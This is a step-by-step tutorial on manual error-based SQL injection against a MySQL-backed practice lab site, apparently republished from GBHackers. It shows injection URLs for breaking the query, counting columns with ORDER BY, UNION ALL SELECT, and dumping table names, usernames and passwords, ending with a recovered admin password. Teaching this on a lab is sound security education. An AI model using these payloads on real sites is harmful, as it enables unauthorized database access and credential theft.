SQL injection is the code injection techniques to gain access to the database(MySQL, MSSQL, Oracle etc).Owasp 2017 Release still describes this injection as A1 or Level 1 injection which is most dangerous attack over all the time.
SANS Top 25(Most Dangerous Software Errors) describes SQL injection as Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) as Rank 1 of Injection.
The automation of this injection can be performed with a large number of tools available on the internet.Better than tools Human have creative thinking and decision making to understanding the target, so I preferred to go with manual penetration.
NOTE: Scope of this SQL injection only for backend MySQL database.If you test the same with Oracle or some other databases it never works.
SQL Injection ONLINE LAB:
- Beginners can use this website to practice skills for SQL injection
- To Access the LAB Click Here
- Above Screenshot will be your successful welcome screen.
STEP 1: Breaking the Query
- Visting the website http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1
- Let us add & check single quote to existing URL to check whether the website is vulnerable to SQL Injection by adding http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1′
- After adding single quote If the website shows error statement “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”1”’ at line 1
- That’s Great !!! It is Vulnerable to SQL Injection
- This Illustrates you have successfully Broken the query & Backend Database is interacting to Hacker with error messages.
STEP 2: Copying the Error Statement
- Copy and Paste the SQL Error statement into Notepad.
- After copying Perform actions to error statements as mentioned in below screenshot
- Above figure Illlustes that Highlighted single quote is breaking the backend database
- Now Imagine yourself as DEVELOPER and Guess the SQL statement in Database.
- Hope everyone has Guessed the backend query looks like this Select username, Password from table where id =’1′
- When we add single quote which is mismatching the query like this Select username, Password from table where id =’1”
- This is called as Single quote error based string injection.
STEP 3: Joining the Query
- Let us add –+ to join the query http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1′ –+
- Above figure illustrates SQL errors are fixed with –+
- Whatever malicious code placed will talk with database and as of now you have successfully broken the query, joined the query and finally found out it is Single quote error based string injection.
STEP 4: Finding the Backend Columns
- It is time to have a conversation with the database to find the number of columns.To enumerate columns we can use order by command.
So above figure illustrates with no SQL errors, meaning there is 1 column in the database.
- Let me check with rest of columns with order by 2, order by 3 etc.
So above figure illustrates with no SQL errors, this shows still 3 columns are present in the database.
- Let me check with one more column with order by 4
Above Figure shows Database with error statement Unknown column ‘4’ in ‘order clause and this error statement says as “There are only 3 columns in database”.Hope you understand how to talk with a database with errors.
STEP 5: Finding the Backend Tables
- SQL backend may contain more Tables names with empty data also.Therefore You should first able to find out which table names are present in this 3 columns.
- Now we can select all 3 columns with union all select to existing URL http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1′ union all select 1,2,3 –+
- Above Illustrated Figure shows Username is: 2 as the value which represents table names is present in the 2nd column of the database. Now we have successfully found out the table location in Database.
STEP 6: Finding the Backend Table Names
- We already knew the location of table path, so will directly ask database name, version etc
- Above Illustrated Figure shows Backend Database reveals its database name:leettime_761wHole
- Let us do the same to check out database version details with version()
- Above Illustrated Figure shows Backend Database version: 5.6.36-cll-lve
STEP 7: Dumping Database Tables
- Group_concat() is the function returns a string with the concatenated non-NULL value from a group.
- So we can use this Function to list all Tables from the database.
- In Addition, we can use Information_Schema to view metadata about the objects within a database.
- The Above Figure shows the dump of all tables as testtable1, user logs, users.
STEP 8: Dumping all Data in Columns of Tables
- Here I will dump for users in table.
- The Above Figure shows the dump of all columns of tables contains id, username, password,user_type,sec_code
- Here Usernames and Passwords are most confidential one.so let us dump !!!
STEP 9: Dumping all Usernames
- Here we can dump all usernames in the database.
- The Above Figure shows the dump of all usernames injector, decompiler, devil hunter, Zen, Zenodermus, grayhat, khan, admin
- If I get the credential for admin account that will be great!
STEP 10: Dumping all Passwords
- Now we can use the group_concat function to call password from users.
- The Above Figure shows the dump of all passwords for users : Khan,hacktract,dante,sec-idiots,security-i, hacker, haxor, sadmin
- We got the admin accounts password as sadmin ! Happy Hacking !!!
Source : GBHackers